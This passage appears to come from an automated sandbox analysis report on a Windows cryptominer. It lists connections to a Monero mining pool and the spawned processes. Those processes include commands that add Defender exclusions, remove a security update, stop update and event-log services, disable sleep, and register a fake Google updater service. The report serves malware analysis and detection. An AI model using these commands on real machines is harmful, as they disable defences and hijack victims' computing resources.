                                        Oct 7, 2024 03:06:00.977834940 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:01.975619078 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:02.180959940 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:11.992098093 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:12.180882931 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:12.625109911 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:12.630759001 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:12.823175907 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:12.868377924 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:22.006720066 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:22.180963039 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:31.963936090 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:32.180919886 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:42.015311956 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:42.082372904 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:51.975465059 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:52.180891037 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:07:01.979001999 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:07:02.180891991 CEST4970410343192.168.2.5162.19.224.121

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 03:03:15.933079004 CEST5427553192.168.2.51.1.1.1
                                        Oct 7, 2024 03:03:15.941333055 CEST53542751.1.1.1192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 7, 2024 03:03:15.933079004 CEST192.168.2.51.1.1.10xf442Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                        Oct 7, 2024 03:03:15.941333055 CEST1.1.1.1192.168.2.50xf442No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:21:03:01
                                        Start date:06/10/2024
                                        Path:C:\Users\user\Desktop\TwrhjEKqxk.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\TwrhjEKqxk.exe"
                                        Imagebase:0x7ff79f760000
                                        File size:8'538'008 bytes
                                        MD5 hash:DBF8D8EF015846D4078466A7C1D3F41C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:21:03:02
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:21:03:02
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff6982b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7d0790000
                                        File size:345'088 bytes
                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:23
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:24
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:25
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:26
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:32
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:33
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:34
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                        Imagebase:0x7ff7d9930000
                                        File size:8'538'008 bytes
                                        MD5 hash:DBF8D8EF015846D4078466A7C1D3F41C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 55%, ReversingLabs
                                        • Detection: 46%, Virustotal, Browse
                                        Has exited:true

                                        General

                                        Target ID:35
                                        Start time:21:03:11
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:36
                                        Start time:21:03:11
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:37
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff6982b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:38
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:39
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:40
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:41
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7d0790000
                                        File size:345'088 bytes
                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:42
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:43
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:44
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:45
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:46
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:47
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:48
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:49
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:50
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:51
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
